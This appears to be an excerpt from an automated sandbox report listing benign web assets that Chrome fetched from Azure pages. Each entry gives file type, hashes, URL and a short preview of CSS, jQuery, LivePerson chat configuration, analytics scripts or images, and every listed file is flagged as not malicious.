                                                                        SHA-256:69C4B01DA0A46D60C7DA3CD7408AA905A6752888C4459F40FB6A6E3B842801C2
                                                                        SHA-512:11D03F598CE232FCA401369FC5C2471A29DACE395F1EDF82914D7A29348B57A5F7752EC84288612EC3AC96485B696577A0C7ED76E97245BAA03E62206C805C88
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-azure.min.ACSHASH10f475f82a7b1aa39752e1331d2f46d8.css
                                                                        Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.308.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (65447)
                                                                        Category:dropped
                                                                        Size (bytes):89501
                                                                        Entropy (8bit):5.289893677458563
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 24x25, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):434
                                                                        Entropy (8bit):7.3531201214814095
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:17E6C24EB0567553C1BD6B9F86B69FF3
                                                                        SHA1:176A75099EE16D08C59E919FCE425E794F64ED0D
                                                                        SHA-256:068CF1A3AB3419BB4CAE57E1E617055319BA3103210858EF1E6BBDD9B6DE15BD
                                                                        SHA-512:A6DE5F10DE4AE3300F32815FB5381951168827EF44F40C3FAAECA13DD0156C242C81C7E6A234503ECE8C612DC5C31F2D27CED867462D243892FE1C09CD16A226
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 ....P....*.......%..O.|......._.....u..R.D.....7.g.o........?...?r......./...?..{.D?Q..(..u.w ...f.....;~j.......p)...Q.....zYy.....{...o..@.]_.....$.oY.....1..b.z.XPj...#.nO+.c6.....?....J.../Xv>A..N..."}..2.'.......4..i).....[{i^.=#zV.|.z.ZA.0..u.-..[{.s.8..S.>c.O..}v.....B..?}n._.=C.$.u..*...r.2%.*r.d4..=...d.J....X...._.l..L~.1..d..<.....{...B..Lr.e.......A!..|.}u 4.0z...W....|J.G#.za......
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (2330), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):2330
                                                                        Entropy (8bit):5.57133970187188
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6CD980EF27B2A2A76977B30CC30C0C0E
                                                                        SHA1:85B9194648EDDA7424B1FAADE56D204D0CA9CDFE
                                                                        SHA-256:6D8D49BD69A5D474F9533A65D195F11BF18853B5F000D3B26DF4D7A206F33CA3
                                                                        SHA-512:2CF2897D4E5860C056E7AD0E7465698FC15B0E79CFD4928822AABDB97B6F71871E9D09D021BC5F0AB8BA17D178F0A2CC8A681776F2A00BB8927DA71504A052C0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:lp1820071130({"onsiteLocations":[1362597414],"followMeTime":0,"connectorId":1644210230,"renderingType":1,"channel":1,"allowUnauthMsg":true,"windowConf":{"json":{"externalConfiguration":null},"type":"internal"},"description":"","language":"en-US","source":0,"type":5,"enabled":true,"skillName":"BOT-AZURE-GREETER-EN-US","isUnifiedWindow":true,"id":1820071130,"isPopOut":false,"timeInQueue":0,"visitorBehaviors":[138786914],"followMePages":1,"availabilityPolicyForMessaging":1,"campaignId":"1820071030","zones":[1362587614],"windowId":1725073630,"conversationType":1,"skillId":1728811530,"useSystemRouting":false,"effects":{"useLightBox":false,"secondsToCollapseAfter":0},"createdDate":"2020-01-06 17:27:53","connector":{"deleted":false,"configuration":{"acrValues":["0"],"pkceEnabled":false,"clientId":"60270350","jsMethodName":"lpTag.taglets.unAuthMessaging.lpUnauthFunction","jsContext":"lpTag.taglets.unAuthMessaging","jwtPublicKey":"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvGQctwBFFZBaSu+LC4LV
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (889)
                                                                        Category:downloaded
                                                                        Size (bytes):92962
                                                                        Entropy (8bit):5.482012211093105
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:35986A813756F39AB6B922979FFEDB03
                                                                        SHA1:C8E2213BBAFAF535DA9C6676F3DBA43449E4D15A
                                                                        SHA-256:E2D92BDAAD925C6D355331A338384EE3FF82492352975DD4EFDA791AEF4AB3F5
                                                                        SHA-512:289F1C432E73F611D54EB1130013174174222A0C5EEF8E2464C5FD51EE33DC702326EEECA80B2AAE213DB2FCCB149297FC37CC9A0B6CF6E928A66BC27843F930
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-jquery.min.ACSHASH35986a813756f39ab6b922979ffedb03.js
                                                                        Preview:/*. jQuery JavaScript Library v3.5.1. https://jquery.com/.. Includes Sizzle.js. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://jquery.org/license.. Date: 2020-05-04T22:49Z. Sizzle CSS Selector Engine v2.3.5. https://sizzlejs.com/.. Copyright JS Foundation and other contributors. Released under the MIT license. https://js.foundation/.. Date: 2020-03-14.*/.'use strict';(function(H,Sa){"object"===typeof module&&"object"===typeof module.exports?module.exports=H.document?Sa(H,!0):function(Ta){if(!Ta.document)throw Error("jQuery requires a window with a document");return Sa(Ta)}:Sa(H)})("undefined"!==typeof window?window:this,function(H,Sa){function Ta(a,b,c){c=c||M;var d,f=c.createElement("script");f.text=a;if(b)for(d in Kc)(a=b[d]||b.getAttribute&&b.getAttribute(d))&&f.setAttribute(d,a);c.head.appendChild(f).parentNode.removeChild(f)}function Ia(a){return null==.a?a+"":"object"===typeof a||"function"===typeof a?db[Ob.call(a)]
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text
                                                                        Category:downloaded
                                                                        Size (bytes):308
                                                                        Entropy (8bit):4.70981696594715
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:D54C23BA76BD8648119795790AE83779
                                                                        SHA1:D8D52ACAEB44EF8D5ED93D3EB65465AEFC8E8EA7
                                                                        SHA-256:50F43ABADD35CC811C5C927FA149DD93E18707562D9961D82208B3261E2C1A34
                                                                        SHA-512:1844CD63F89AA92C33D9D7E691B1F8DFB55F3195E86FB359719E6E81E82A98C5BBE3889D33C37499768F51DF5A48BF0633254F64E3257572566D444CCFC26FF9
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/core/wcm/components/tabs/v1/tabs/clientlibs/site.min.ACSHASHd54c23ba76bd8648119795790ae83779.css
                                                                        Preview:.cmp-tabs__tablist{display:flex;flex-wrap:wrap;padding-left:0;list-style:none}..cmp-tabs__tab{box-sizing:border-box;border-bottom:1px solid transparent;padding:.5rem 1rem;cursor:pointer}..cmp-tabs__tab--active{border-color:inherit}..cmp-tabs__tabpanel{display:none}..cmp-tabs__tabpanel--active{display:block}
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (32197)
                                                                        Category:downloaded
                                                                        Size (bytes):48665
                                                                        Entropy (8bit):5.397492809727543
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:6CAB0DE42E6BC92FAEDC367FF28099C4
                                                                        SHA1:A7849EBEB1CE1C7384AE6576D03A80F285802854
                                                                        SHA-256:ECBD8C69A4D0B69033B1E2BC7F50CE507F2843CE18F345F19DE1D5ECE5FE161E
                                                                        SHA-512:7EC29242FFAA3FBD47E9D7EC946DA6641A8B2F14A6429BB0BDFC701761BA1E94FF9F2BF65F7B695CBF04E0751F428D670CF25053E1B6828EC160AFC02F4E6C4D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lpcdn.lpsnmedia.net/le_secure_storage/3.31.1-release_1465379762/storage.secure.min.html?loc=https%3A%2F%2Fpublisher.liveperson.net&site=60270350&env=prod&isCrossDomain=true&accdn=accdn.lpsnmedia.net
                                                                        Preview:<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en"><meta http-equiv="X-UA-Compatible" content="IE=100"><script type="text/javascript">window.lpTag=window.lpTag||{},window.lpTag.lzString=window.lpTag.lzString||function(){function e(e,t){if(!o[e]){o[e]={};for(var n=0;n<e.length;n++)o[e][e.charAt(n)]=n}return o[e][t]}var t=String.fromCharCode,n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={},a={compressToBase64:function(e){if(null==e)return"";var t=a._compress(e,6,function(e){return n.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:a._decompress(t.length,32,function(r){return e(n,t.charAt(r))})},compressToUTF16:function(e){return null==e?"":a._compress(e,15,function(e){return t(e+32)})+" "},decompressFromUTF16:function(e){return null==e?"":""==e?n
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):318394
                                                                        Entropy (8bit):7.991098823010142
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:3A082E699358485F5C5C2061EAAE6D6D
                                                                        SHA1:636395E690E560D8F272C4C45F73CB834A78B5CF
                                                                        SHA-256:64BEDD24402DFBC66FCFBD839326E5B4194D512C7570EA0CD0137FFA3C9E10BC
                                                                        SHA-512:D6B0BA97B724D992740A73F2C9D23AA1641BA1D2A41A8B010183C3D1D98B7CE15F12316609B6C4EB21367620A211560243EFF86D87BEA85FBD0F923BB84B5A35
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../....@.d+l3...x...ANJ.....vb.....Y....&...........G.;>..$.so.......y..b.(..."..7;N...mii..f?...h${:N..m.R[.:T...$/v....#9M..tTwU.W....d.....)-..tp..].~.G..mi"N.V... AZ...'R+.r.lU....C..J..zc..lMb.K.T...#`..V26Ipi.7......$q..~/i-}....&....;.E.6..8.$..ho...hif....|6*.....1.$.O{...X`S..h..'}.Z.u.2.t..jT..k\..X....*_u|{..Z..d$.Im).A]..ZIE...9/.B....>. 3..L{<.....d..a..2g..|...2..-......s.af.I.9............$.....{...#.H.c...c<...x.<.8'.f..J.m9.....z....<j...Z9...y..P4.m.$.._.._x.g......o...RJ..V$I..8C.....]z....k...MS$I...n.(.c.GX..S.SNQJ.E)9Q.....0...0|....K.B..x.E... ..Vl**...8.........D.e.4a..^j*................eQ.......F....p...n.(.U.j..c_.m.FE....8......W...xM.1ljA.-Q.....g..j......m.5...Wk....._./....q...3..;.2..^(.m...#...c.K.22.%..0aS..`2Dn..... .m..`.B..=.A.psk...8...H...~.k..'./.%*..i...T.)...\....RRB.!...[.-.L..M.}....@3..!rq.M,..qu.c.w:...?...^.........>..;*...m[....C.......TgX..P...:..0..D..^....0..!...Z...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ISO Media, AVIF Image
                                                                        Category:downloaded
                                                                        Size (bytes):127955
                                                                        Entropy (8bit):7.997494748324608
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:C301F3A1C251D227284C30EB26119C45
                                                                        SHA1:0D4D652A6A2692AA4EB3912A6BA3F2550396A6AB
                                                                        SHA-256:1CB19C667CB6C6DC35F1895FA4DBEE791F65724F994514D83E709BDA85F9B617
                                                                        SHA-512:5821F684E27BA530ADB702D7B5D7F6E7E889B982378AAA933B46EFCEDDF05E42E6F30B6756365FE8CEF9EE7F718DCBB2A00B8B3D9E43358802A7D111895C819E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/371220-mobile-vertical-accordion-solutions-data-transformation-tab-4-328x270?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=656&hei=540&qlt=100&fmt=png-alpha&fit=constrain"
                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...................(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma...................mdat.....&h.o.....2...D....'"....Ks....8..m.,.%.i.....t.8.o.....p.b.._j..Bm..H..u...K.V.P...O1..Ad1jvX....Y.^..HJ..];1..Z...L.b..w...D...._..2vL.P.h..4...P.x..>.1.o.l..V....!....S..W.5.|+.}1....i.8n9.O.........P...gd..=uB...p.._...%...y..R.i+.b?...._..s.`....)...... .....C..|.TR.....j..6....3...r}.,..]..*.;o.._........W.[.......H...k..2...WI..D.:F.u.~..g+.bT.r*/..'.......:.(..)...L...6.....l.......(.*3.lf.}.f%..A...(n)..9.-[u%.i.......@'.Aq.V.j[.f.N..#L.w.!.qD....'.U.F.h.2.v..g.PD..g...#>..>.Y{Y.V...q..C}B.c.Gf......u...%.:.V..TG.zm..Z...(P.a.zF.v....".6._.....UWB4k..7$h....\.o..........=Y.b...h.-0.....nnJ\7E.,.Z....K..B..b..~_..$.+..i).~..T].>J._g:.....W.".WQ.0../5.........D.m..
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (21576), with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):21576
                                                                        Entropy (8bit):4.929076929051309
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1FADB8843D35CB466D791D16E49E6F7C
                                                                        SHA1:13A104C17E7DD3C2D630E20275C834DA135D00F4
                                                                        SHA-256:C11C85A68D84014B174CC1FFB89ACA01931A03391C6149A3E3659D37162EBAEA
                                                                        SHA-512:7BDFFD1C4559BEAFE995ACACE978A625D51FE4B24894C24A8DBB4C8A47A302DC2EBBE02318A76CAA8FC4D4D8F3B45931B3B354DDA91E1C53E2D5C79B576F4E63
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:lpZonesStaticCB([{"id":138781714,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Right Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":19},{"engagementSubType":22},{"engagementSubType":18},{"engagementSubType":17},{"engagementSubType":26},{"engagementSubType":24},{"engagementSubType":27}],"isDeleted":false},{"id":138781814,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Offsite","deleted":false,"zoneType":2,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":29},{"engagementSubType":30},{"engagementSubType":28}],"isDeleted":false},{"id":138781914,"createdDate":"2017-02-28 18:44:28","modifiedDate":"2017-02-28 18:44:28","name":"Left Overlay","deleted":false,"zoneType":1,"mainZone":false,"capping":0,"mapping":[{"engagementSubType":25},{"engagementSubType":16},{"engagementSubType":23},{"engagementSubType":15},{"engagementSubType":21},{"engagementSubType":14},{"engag
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):296028
                                                                        Entropy (8bit):7.993270073994328
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:DCC4D2A69BA336C0EB35DAEBB1B28CE7
                                                                        SHA1:CB105318A174751B96D47E5CEDE625B2B600CEB8
                                                                        SHA-256:18A6A277BD0E60C7EBCC66AB29F98BDACCEB898575AC334E0F606A533391544F
                                                                        SHA-512:0A1F6297128F839CB9D10D9163AD6B66EF86DC5A959F16307DDB4E6E51A09B0C9134F724412A910B9C5E8C609A037E075821B3E4AF5062A9A44D2B2AB43270A5
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFFT...WEBPVP8LH.../....Hl.H.$.3nMwU............@..@.$|......99.....<......#.....C...$$../I$.H........WIU%..T..].t.%.~ls.e...R....I../lw..WwK=3m~..gw.v.J.......{Fj..3.R.v..K..ff.....$[......g2.3..W.d...9G.Iw..Ib...|$...{f....c..*......\.....H....mW.ei.].M.........t...u..`..r..X.3c.r...<....>q.N......2..4.i.k...b...~tMW....5c@h....\=t.[...T.L.f'..t.Jo.H<...6k%.*?%..`IPN.......~..AR...;[...,UWw...03.5.o.O8..RUw.RIRU.^.8G.dm.....GJ.z#I.........._HRr.9..:'A...........O...... i...7{.KHZ....Xk....^.....x%.."I.dK(......8[..'x...8.....h)..H...q...\..P-|....IR..$I.$%.........=.&I..1...m.%.1.#l.q.-.-.(%....((DUQ.Ra...b.~.7..FE-.7....n........RQa.T.-~S.B...x.x...."...[KEQQ..b.28...E.....o....0\\.0*Nx.M.....MJ...R.Ra...........C..3......]+..P.}..8r.x..RQQ)).j?.u..u.y...r^..FF>....w....~.s$. ..".8.@;.q...k....p~.K....X.P.1.1.+VTw...L^.j5.*...f....%...*....1...@..:...]sc^.W..i-.yD..(%....$.k.k.u.S(...A.^.5P!:.;2'...............i...U....U(W.....F
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (44755), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):44755
                                                                        Entropy (8bit):5.388052626258843
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E3E68C940226C4D15D51792C17ADBE9C
                                                                        SHA1:0B030255624C75DD77B015B7FC77949D5E01CD63
                                                                        SHA-256:9A8D16CF69B04F17BF869FDC4B81588CDE13C410F37E079820B54E1BAED4BAC7
                                                                        SHA-512:F1CB89AFA14C82AA430A62FE5A829003507778DC3292C02A1B580B84AF9465C47A0B72501C1B4E64DE3882837E53123433EDA63B7828F3B41D206E8E9AE99B3F
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://lpcdn.lpsnmedia.net/le_secure_storage/3.31.1-release_1465379762/storage.secure.min.js?loc=https%3A%2F%2Fpublisher.liveperson.net&site=60270350&force=1&env=prod&isCrossDomain=true&accdn=accdn.lpsnmedia.net
                                                                        Preview:window.lpTag=window.lpTag||{};lpTag.firstParty=!0;window.lpTag=window.lpTag||{};window.lpTag.lzString=window.lpTag.lzString||(()=>{var y=String.fromCharCode,r="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",o={};function a(e,t){if(!o[e]){o[e]={};for(var r=0;r<e.length;r++)o[e][e.charAt(r)]=r}return o[e][t]}var i={compressToBase64:function(e){if(null==e)return"";var t=i._compress(e,6,function(e){return r.charAt(e)});switch(t.length%4){default:case 0:return t;case 1:return t+"===";case 2:return t+"==";case 3:return t+"="}},decompressFromBase64:function(t){return null==t?"":""==t?null:i._decompress(t.length,32,function(e){return a(r,t.charAt(e))})},compressToUTF16:function(e){return null==e?"":i._compress(e,15,function(e){return y(e+32)})+" "},decompressFromUTF16:function(t){return null==t?"":""==t?null:i._decompress(t.length,16384,function(e){return t.charCodeAt(e)-32})},compressToUint8Array:functio
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):159
                                                                        Entropy (8bit):4.661188988961239
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C22EA5B46F3FCAD90DA0ABCC0A3F73D4
                                                                        SHA1:2DB789C63AFB63D98932D7B55907DC3508E318B4
                                                                        SHA-256:8334DAA260516BB896407461E5F10E8E3041B06C56846BBB9D3435C6E77513AD
                                                                        SHA-512:A0359F8C25DC40CEFFD14A41BA81794717B99DABE78CBF8A8678F3E3EC57F317388CA0DC55B1CC6AD2D6C13D2B3CAEB5A64527BB2C646ED2D93775437DA646F1
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://azure.microsoft.com/etc.clientlibs/microsoft/components/structure/page/clientlibs/featurecontrol.min.ACSHASHc22ea5b46f3fcad90da0abcc0a3f73d4.js
                                                                        Preview:'use strict';function isFeatureEnabled(b){var a=document.getElementById("customFeatureControl").getAttribute("enabledFeatures");return null!=a&&a.includes(b)};
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 24x25, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                        Category:dropped
                                                                        Size (bytes):488
                                                                        Entropy (8bit):7.489087735243133
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:2FF3D734D51C2BC9434FCFB165004330
                                                                        SHA1:E957D955CD807DB3666EDD2A94A1BDF949EF843D
                                                                        SHA-256:A46CD540AD01A14CD3E9E3C4BC2FE75F5335F39A16A085690B1027F4DC0089B7
                                                                        SHA-512:22B6A01CF8A00DC37EB313743689B445965646C1C1F50D0365F3541FB144F51F3BC0575746A11F40A616752BD8F709CD57D168038C520820E601904A487E7976
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8 .........*....>9..C.!.... ........~..........C..c@~@j.~;..U......(.....$...[.......@..jV..(....:$OG.'.......%..PF...y^...i.........|......!?4.y,.W..[.[.6.....2..+......&t}..l..+...i.....x.g'...T..../....r@jDf...X.......C..1.)..z.'x;.>.......8D.9Q&..........Y..Es....n.Ql+H..~..w...Xe&........7.......sJ..@0.....R......+..|..:..yI.H...T..!...E..XG.m1e.i...L.7JB.:.p. ].v..+".I..R <.........g..U=`........b.g.......b..+..#..5c.....+G.3....
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C source, ASCII text, with very long lines (65103)
                                                                        Category:dropped
                                                                        Size (bytes):209939
                                                                        Entropy (8bit):5.366006952026174
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:FA4C76A7FDE62B18054CF7EB8E946012
                                                                        SHA1:B20150066A879D2B78DD3D4908F4ACD148EE66F8
                                                                        SHA-256:09EBD7F407439990AAC227E70DA23E1A819E8E30282928E324370805F480BEC4
                                                                        SHA-512:D72F5D078675C7ADBF6BFC1980712542A10668AEC9163137A2EC70A5E117F8FFDD0F06A6C4C6636E35C04F2754F33D40C65C59D452AFAA8EA4A382F24F200ABD
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.720.0 b17966bb92f8ac2ddcda4ac1d9c0aaea6d2eda7b */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document.doma
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:C++ source, ASCII text
                                                                        Category:dropped
                                                                        Size (bytes):3280
                                                                        Entropy (8bit):4.696081700274861
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                        SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                        SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                        SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                        Category:dropped
                                                                        Size (bytes):253410
                                                                        Entropy (8bit):7.9924023314866295
                                                                        Encrypted:true
                                                                        SSDEEP:
                                                                        MD5:CD354568FEC200EDF3CCEB1DE52FDE57
                                                                        SHA1:6E6DD030459D3658A45EF23018318CE2932F6E85
                                                                        SHA-256:B93F2E954434566ADC01FD589ED6A22A55B9055B23DCCE3787E1080768BB5D2D
                                                                        SHA-512:F4957065A0C22FCD250153EF2C726F871FE45CE9A500D3804AD4A4359779BDE0DDAABA85D0DBA062924F59B2F9FCCF56AF8C3823533375513F185A9ECF52079D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:RIFF....WEBPVP8L..../?.Y...n....q....p..=!....].$;m...y.=FDD.....Dn.r..!.c./"..|..$ x@.....,...>.....(.N.9.G7..l....%.i;sd...u8...Ne............tw.....!../..)...C..}3.pv...q.=m..9..."...n..vv..,X..8.....W0Y..z.I..._n .a.q.~$..ks.UM.a.h.V.H7.v....3"./.v......SU.6s.@.nY..9..\u..X... ..eI.rU..1A,@~.........s.. .y6....^..y.q.....O.~.*..9.".....s86..0.tn.V.F.uD.1..G.........%G.U.Q...i....U.L_...?......... K.m......W<)=..k@..%....j[.$.`..a8.'p..H._Zk9../..Z.n.?..". ......^W..34..$I..a......+..a..r..3.......A.Bp....$.....n..EQ.[.[.Yo..@..g.s`a....\..&........jqW).r...B..(@...+8S`.../p...A'.Nm*.w.X....3._.`.`.6@...`..u,......`.s.o.s.E.yt^|..SJ)((..R...3..].......c&..S...y.qt.h..%.R........3......d.^..$.B.@;...?O.%..R..s...........$@....=u..........@8..i.TQ.s.&..].F.k.V.@}Y..t{@.(.rS..B...9.....N....BP...[.BE........n.........G8..$.....x.G.....W.. ......F.a...8N!.z.8r.......BA.6....... 6.....BS..Y......OW.(eo(.a..@8.............W`....Z.}....0...
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:HTML document, ASCII text, with very long lines (2789)
                                                                        Category:downloaded
